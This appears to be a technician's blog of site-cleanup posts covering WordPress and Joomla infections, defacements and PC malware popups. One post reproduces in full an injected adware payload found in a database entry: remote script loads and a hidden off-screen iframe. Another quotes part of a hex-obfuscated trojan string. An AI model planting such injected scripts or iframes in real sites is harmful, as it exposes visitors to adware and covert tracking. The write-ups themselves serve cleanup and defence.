WordPress site blocked by SonicWall – JS.Agent.NKW_2 (Trojan)

Had a customer’s website blocked by our internal firewall.

dr_blum_homepage_blocked_infection_small

They were running WP Antivirus Site Protection plug-in. It listed the following files.

  • /wp-content/plugins/nextgen-gallery/nggallery.php
    /wp-content/plugins/nextgen-gallery/products/photocrati_nextgen/modules/ngglegacy/lib/imagemagick.inc.php
    /wp-content/plugins/nextgen-gallery/products/photocrati_nextgen/modules/router/class.router.php
    /wp-content/plugins/nextgen-gallery/products/photocrati_nextgen/modules/router/class.routing_app.php
    /wp-content/plugins/nextgen-gallery/products/photocrati_nextgen/modules/router/interface.routing_app.php
    /wp-content/plugins/nextgen-gallery/products/photocrati_nextgen/modules/wordpress_routing/adapter.wordpress_routing_app.php
    /wp-content/plugins/nextgen-gallery/products/photocrati_nextgen/modules/ngglegacy/admin/functions.php
    /wp-content/plugins/si-contact-form/includes/class-fscf-process.php

 

This link provided me with some detail. There was a code that looked like “\x73\x63\x5F\x63\x6F”,\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x42\x79\x49\x64″,\x63\x6F\x6C\x6F\x72\x44\x65\x70\x74\x68″,\x77\x69\x64\x74\x68″,\x68\x65\x69\x67\x68\x74″,\x63\x68\x61\x72\x73\x65\x74″,\x6C\x6F\x63\x61\x74\x69\x6F\x6E”,\x72\x65\x66\x65\x72\x72\x65\x72″,

Deleting this out is supposed to help.

https://wordpress.org/support/topic/jsagent-warnings-in-avg-nightmare-hack-in-multiple-wordpress-sites

Here is a good article on this issue.

http://blog.sucuri.net/2012/12/website-malware-sharp-increase-in-spam-attacks-wordpress-joomla.html

 

 

WordPress site infected with CouponDropDown Adware

Customers WordPress site got hacked. They use Network Solutions as their host. Network Solutions took their site offline. We had to delete all the WordPress files, upload a clean version, and put their content and theme back. After that the site was back up and running.

I reviewed the site to make sure the permalinks didn’t cause a problem. On one page there were banners ads showing up.

lawyer_website_xxs

The issue turned out to be a form Cross Site Scripting or SEO poisoning. There was a database entry that had the extra text in it. Here is the text below.

————————————————————————————————–

<div id=”__tbSetup”></div>

<script type=”text/javascript” src=”http://cdncache3-a.akamaihd.net/loaders/1032/l.js?aoi=1311798366&amp;pid=1032&amp;zoneid=62862″></script><script type=”text/javascript” src=”https://loading-resource.com/data.js.php?i={6C425871-ABD5-4124-A2B2-C02CE1D37F67}&amp;d=2013-1-17&amp;s=http://mcmanus-darden.com/home/wp-admin/post.php?post=361&amp;action=edit”></script><script id=”__changoScript” type=”text/javascript”>// <![CDATA[

var __chd__ = {‘aid’:11079,’chaid’:’www_objectify_ca’};(function() { var c = document.createElement(‘script’); c.type = ‘text/javascript’; c.async = true;c.src = ( ‘https:’ == document.location.protocol ? ‘https://z’: ‘http://p’) + ‘.chango.com/static/c.js’; var s = document.getElementsByTagName(‘script’)[0];s.parentNode.insertBefore(c, s);})();

// ]]></script><script id=”__simpliScript” type=”text/javascript” src=”http://i.simpli.fi/dpx.js?cid=3065&amp;m=1″ data-sifi-parsed=”true”></script><script type=”text/javascript” src=”http://www.superfish.com/ws/sf_main.jsp?dlsource=wjfudcm&amp;userId=ezZDNDI1ODcxLUFCRDUtND&amp;CTID=default-US”></script><script type=”text/javascript” src=”http://www.vitruvianleads.com/build/production/selectionlinks/templates/bootstrap.js”></script><script type=”text/javascript” src=”http://i.simpli.fi/p?cid=3065&amp;cb=dpx_48652254532._hp”></script><iframe id=”l3adg3n-xdm” style=”position: absolute; top: -1000px; left: -1000px; width: 1px; height: 1px;” src=”http://www.vitruvianleads.com/build/xdm.html” width=”320″ height=”240″></iframe>

————————————————————————————————–

There were multiple entries under this title. I used the source to figure out the actual page is was effecting. It was entry 361. There were approximately 20 revisions, but it was the original 361 that took the script off the site. It was in some revisions but not all.

I hope this helps someone else….

 

Solved Internet Explorer won’t open – EMET 5.0 conflict

We have a customer that must use Internet Explorer for the work software. It is how the login, punch their time clocks, and perform sales. Well Internet Explorer suddenly stopped working.

The first time I uninstalled IE, and this worked for a short time. The real issue turned out to be EMET 5.0 was preventing it from running.

Solution was to uninstall EMET 5.0, download 5.1 and install it. Everything worked after that.

I hope this helps someone else.

Malwarebytes trial expired box pop up in taskbar.

Client started getting a Malwarebytes popup next to their clock in the system tray. Worried about this being Malware itself I didn’t click on it. I uninstalled the version of Malwarebytes that was currently installed and reinstalled the a new downloaded free version.

I also ran CCleaner to clean the registry. It didn’t find anything related to MalwareBytes. I then re-installed MalwareBytes.

What I should have done is in this Forum post. MalwareBytes makes a cleaner for uninstalling their product. If the customer continues to get the pop up I will log back in and uninstall the current version >> run the cleaner >> re-install a new download of MalwareBytes. Below is the link I found.

https://forums.malwarebytes.org/index.php?/topic/113042-malwarebytes-trial-version-expired-message/

I hope this helps someone else.

ip:184.154.224.12 joomla in my Google Analytics organtic search traffic.

Today I noticed “ip:184.154.224.12 joomla” as a organic keyword search in my google analytics account. Here is what i did next.

      1. Put the whole “ip:184.154.224.12 joomla” in the url bar and hit enter. The browser didn’t recognize the “ip:” part. When I deleted it and hit enter again. This didn’t get me much.

I googled “ip:184.154.224.12 joomla”. The top result led me to

http://sameid.net/ip/184.154.224.12/3/

      . Here I was looking for my site but saw a customers site. I verified the analytics number and they matched.


The site shows how the others sites are built. I could easy see other Joomla and WordPress sites. Curious if this info is used by hackers to go after these types of sites.

I found another customer’s site.

 

How strong should I make my passwords?

I have recently tried some password cracking tools. These programs are very good are cracking a password. They can tell the user how long it could take. Simple dictionary words and numbers can take a few minutes. As soon as you adding punctuation and special characters that number jumps to days. The more characters will make jump even more days.

Pass phrases are better. Here is an example: Be here @8!

Basic tips for good passwords are as follows.

  • Minimum of 8 characters
  • Capitalize a character or two
  • Add special characters.
  • Avoid dictionary words.

Zip Opener / Trojan Virus – download

While trying to learn Backtrack I somehow clicked on something that initiated a download of ZipOpenerSetup.exe. The AVG antivirus caught a trojan virus. Here are the pages I was on:

http://www.backtrack-linux.org/downloads/

I was downloading several items, so when an installer popped up I choose to run it. That’s when AVG jumped in. I wondered why I was installing a Zip program. I already have several. I canceled the install and it took me to this page.

http://www.thenewzipopenerfun.com/gb/uninstall/?sr=gb&lp=sag&cc=US&c=1

http://www.thenewzipopenerfun.com/

By using the URL above I found where to download the software I am labeling as Malware.

Beware of what downloads you click on!

When googling “ZipOpener malware” I found some people had/have issues with this, and I don’t find a page to download it. I was either careless with my mouse clicks, could be cross-site scripting, or it could have been something else.

Top it all off I realized it left a desktop icon so I would complete the installation.
zip_opener_continute_icon

I ran a Malware Bytes scan and it returned 7 items it found as known threats, and the reinstall for Zip Opener was one of them. There were also some other exe files.

zip_opener_malware_bytes

Be careful out there.

More info:
http://thundercloud.net/infoave/new/be-very-careful-when-downloading-slow-down-read-be-wary-and-take-your-time/

 

“iolanipalace.org” and “Pay Day Loans” text showed up in my Joomla 1.5 template

I am starting another Joomla 1.5.23 upgrade to 2.5 for security reasons. Before I started I noticed “payday loans” hyperlink going to “iolanipalace.org”.

payday_loan

This was not a module area it was in the index.php file in the template. I went to to the template to see added text. I highlighted the text in blue.

payday_loan_code

I googled “iolanipalace.org” and came up with a link I didn’ want to click on.

516Cash: UK Payday Loans


www.516cash.com/

UK Payday Loans from 516cash. Up to £1000 in 15 minutes! Instant Approval! No Transfer Fees, Apply Now!


Seems like a scam lead through Cross-Site Scripting. I am hoping the damage isn’t severe.

Upgrade your Joomla 1.5 sites before it is too late.

 

Hackeado por HighTech Brazil HackTeam hit one of my Joomla 1.5 sites

While backing up a customers site to prepare for a new Joomla 2.5 site to be installed I noticed a file called “xk.txt” in the root directory. I opened the file to see only the following text.

Hackeado por HighTech Brazil HackTeam
No\One – CrazyDuck – Otrasher

I am not going to repair this site because I am already upgrading it. Good reason to suggest any existing customers you may have with Joomla 1.5 site to upgrade or at least back up as soon as possible.

More info on the Joomla Sejeal attack

I have another client’s site attacked by Sejeal. Again I found a “sejeal.JPG” file in the root directory. Client called me saying the hyperlinks don’t work. Browser was giving back 404 error.

I found this article that shed some light on the matter. One of my main tools “JCEditor” has a vulnerability that attackers are exploiting.

http://www.prolateral.com/news-section/news-news/289-has-your-joomla-website-been-hacked.html